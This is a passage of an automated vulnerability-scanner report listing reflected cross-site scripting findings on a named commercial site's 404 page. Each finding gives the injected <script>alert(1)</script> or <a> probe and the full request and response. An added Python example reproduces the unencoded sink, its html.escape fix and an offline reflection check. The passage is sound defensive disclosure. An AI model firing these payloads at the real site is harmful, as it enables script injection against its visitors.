Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fd3cb8<a>de5f2d7e1eb was not found on this server.</p>
...[SNIP]...

2.3971. http://www.resellerbase.com/resources-information/ebooks/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f797b<script>alert(1)</script>622295e4d43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationf797b<script>alert(1)</script>622295e4d43/ebooks/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationf797b<script>alert(1)</script>622295e4d43/ebooks/googlepr.php was not found on this server.</p>
...[SNIP]...

2.3972. http://www.resellerbase.com/resources-information/ebooks/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c256<script>alert(1)</script>2b3346b57e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks7c256<script>alert(1)</script>2b3346b57e2/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks7c256<script>alert(1)</script>2b3346b57e2/googlepr.php was not found on this server.</p>
...[SNIP]...

2.3973. http://www.resellerbase.com/resources-information/ebooks/googlepr.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6dd81<script>alert(1)</script>67f2f6692c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/googlepr.php6dd81<script>alert(1)</script>67f2f6692c5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/googlepr.php6dd81<script>alert(1)</script>67f2f6692c5 was not found on this server.</p>
...[SNIP]...

2.3974. http://www.resellerbase.com/resources-information/ebooks/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload b3039<a>a2eb870b8e was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/googlepr.php?link_id=11b3039<a>a2eb870b8e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/googlepr.php?link_id=11b3039<a>a2eb870b8e was not found on this server.</p>
...[SNIP]...
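Every finding in this section, the "Certain" ones that place a <script> payload in a path segment or a parameter name and the "Firm" ones (link_id above, and the keyword, Submit3 and opt parameters further down) that only proved an <a> tag, reaches the same sink: the custom 404 page writes the requested URL into a <p> text node without HTML-encoding it, so any < in the request target becomes live markup. The Python below is an added example, not part of the XSS.CX report or of the resellerbase.com code. It reproduces that sink as a toy handler beside its hardened form and runs a payload-agnostic reflection check over the same probe positions the report enumerates. The handler functions and the audit helper are illustrative assumptions; the probe and path strings are taken from finding 2.3973, and the 404 bodies are generated by the toy handlers rather than captured from the site.

```python
# Added example (not from the original report): offline check for the
# "request target echoed unencoded into the 404 page" sink shared by the
# findings in this section, plus the hardened rendering. The 404 bodies are
# produced by the two toy handlers below, not captured from the site.
import html


def vulnerable_404(request_target: str) -> str:
    """Toy 404 handler reproducing the sink the report shows: the raw
    request-target is dropped straight into the text of a <p>."""
    return ("<p>The requested URL " + request_target
            + " was not found on this server.</p>")


def hardened_404(request_target: str) -> str:
    """Same page with the one fix that matters here: HTML-encode the
    attacker-controlled string before it lands in a text node."""
    return ("<p>The requested URL " + html.escape(request_target, quote=True)
            + " was not found on this server.</p>")


def classify_reflection(probe: str, body: str) -> str:
    """'raw' if the probe comes back with its angle brackets intact (the
    markup is live), 'encoded' if it comes back only as entities (safe),
    'absent' if it is not reflected at all. Works for any probe, so the
    <a> marker of the "Firm" findings is checked the same way as <script>."""
    if probe in body:
        return "raw"
    if html.escape(probe, quote=False) in body:
        return "encoded"
    return "absent"


def probe_targets(path: str, probe: str):
    """Yield (label, request_target) pairs the way the report enumerates
    them: the probe appended to each path segment ("REST URL parameter N")
    and used as the name of an extra query parameter."""
    trailing = "/" if path.endswith("/") else ""
    segments = path.strip("/").split("/")
    for i, segment in enumerate(segments):
        mutated = list(segments)
        mutated[i] = segment + probe
        yield f"REST URL parameter {i + 1}", "/" + "/".join(mutated) + trailing
    yield "arbitrary parameter name", f"{path}?{probe}=1"


def audit(handler, path: str, probe: str) -> dict:
    """Run every probe target through a 404 handler and classify each
    reflection. Against a live target the HTTP request would be issued
    here; in this offline example the handler stands in for the server."""
    return {label: classify_reflection(probe, handler(target))
            for label, target in probe_targets(path, probe)}


if __name__ == "__main__":
    probe = "6dd81<script>alert(1)</script>67f2f6692c5"  # marker from finding 2.3973
    path = "/resources-information/ebooks/googlepr.php"
    print("vulnerable:", audit(vulnerable_404, path, probe))
    print("hardened:  ", audit(hardened_404, path, probe))
    # The report's requests carry literal < and > in the request line. A
    # browser generally percent-encodes them in the path, and a sink that
    # echoes the undecoded request-target then prints %3Cscript%3E, which is inert.
    encoded = "/x/6dd81%3Cscript%3Ealert%281%29%3C%2Fscript%3E67f2f6692c5"
    print("percent-encoded probe:", classify_reflection(probe, vulnerable_404(encoded)))
```

Two caveats worth settling by hand before filing these as twenty separate issues. A 404 status does not stop the browser from rendering the body, so a reflected payload runs exactly as it would on a 200. On the other hand, the report's requests carry literal < and > in the request line, and browsers generally percent-encode those characters in the path, so confirm the sink also fires with %3Cscript%3E: a page that echoes the undecoded request-target (PHP's $_SERVER['REQUEST_URI'] is not decoded) prints the encoded form harmlessly, whereas one that decodes the path first does not. The last print in the block shows the inert case.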

2.3975. http://www.resellerbase.com/resources-information/ebooks/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6a0e7<script>alert(1)</script>6007ae250e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/googlepr.php?6a0e7<script>alert(1)</script>6007ae250e6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/googlepr.php?6a0e7<script>alert(1)</script>6007ae250e6=1 was not found on this server.</p>
...[SNIP]...

2.3976. http://www.resellerbase.com/resources-information/ebooks/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 14820<script>alert(1)</script>6d9e3a0f068 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information14820<script>alert(1)</script>6d9e3a0f068/ebooks/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information14820<script>alert(1)</script>6d9e3a0f068/ebooks/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3977. http://www.resellerbase.com/resources-information/ebooks/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa56e<script>alert(1)</script>0fb3f7164a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooksfa56e<script>alert(1)</script>0fb3f7164a9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooksfa56e<script>alert(1)</script>0fb3f7164a9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3978. http://www.resellerbase.com/resources-information/ebooks/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 75598<script>alert(1)</script>67ba14c3c56 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/search.php75598<script>alert(1)</script>67ba14c3c56?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/search.php75598<script>alert(1)</script>67ba14c3c56?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3979. http://www.resellerbase.com/resources-information/ebooks/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 335d6<a>f63854bfcec was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/search.php?keyword=search...&Submit3=Search335d6<a>f63854bfcec&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/search.php?keyword=search...&Submit3=Search335d6<a>f63854bfcec&opt=2 was not found on this server.</p>
...[SNIP]...

2.3980. http://www.resellerbase.com/resources-information/ebooks/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 52bf7<a>1951eef40f7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/search.php?keyword=search...52bf7<a>1951eef40f7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/search.php?keyword=search...52bf7<a>1951eef40f7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3981. http://www.resellerbase.com/resources-information/ebooks/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dab3e<script>alert(1)</script>32785d59412 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/search.php?keyword=search...&Submit3=Search&opt=2&dab3e<script>alert(1)</script>32785d59412=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/search.php?keyword=search...&Submit3=Search&opt=2&dab3e<script>alert(1)</script>32785d59412=1 was not found on this server.</p>
...[SNIP]...

2.3982. http://www.resellerbase.com/resources-information/ebooks/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 23c88<a>e40e7e0f0ab was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/search.php?keyword=search...&Submit3=Search&opt=223c88<a>e40e7e0f0ab HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/search.php?keyword=search...&Submit3=Search&opt=223c88<a>e40e7e0f0ab was not found on this server.</p>
...[SNIP]...

2.3983. http://www.resellerbase.com/resources-information/ebooks/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2256c<script>alert(1)</script>98b3a1e535b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information2256c<script>alert(1)</script>98b3a1e535b/ebooks/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information2256c<script>alert(1)</script>98b3a1e535b/ebooks/themes/ was not found on this server.</p>
...[SNIP]...

2.3984. http://www.resellerbase.com/resources-information/ebooks/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1d2fe<script>alert(1)</script>9ce971f7683 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks1d2fe<script>alert(1)</script>9ce971f7683/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks1d2fe<script>alert(1)</script>9ce971f7683/themes/ was not found on this server.</p>
...[SNIP]...

2.3985. http://www.resellerbase.com/resources-information/ebooks/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5aa03<script>alert(1)</script>f7b77d55476 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes5aa03<script>alert(1)</script>f7b77d55476/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes5aa03<script>alert(1)</script>f7b77d55476/ was not found on this server.</p>
...[SNIP]...

2.3986. http://www.resellerbase.com/resources-information/ebooks/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 52f09<script>alert(1)</script>6a9e972a7aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/?52f09<script>alert(1)</script>6a9e972a7aa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/?52f09<script>alert(1)</script>6a9e972a7aa=1 was not found on this server.</p>
...[SNIP]...

2.3987. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3dc2d<script>alert(1)</script>b4d18213563 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

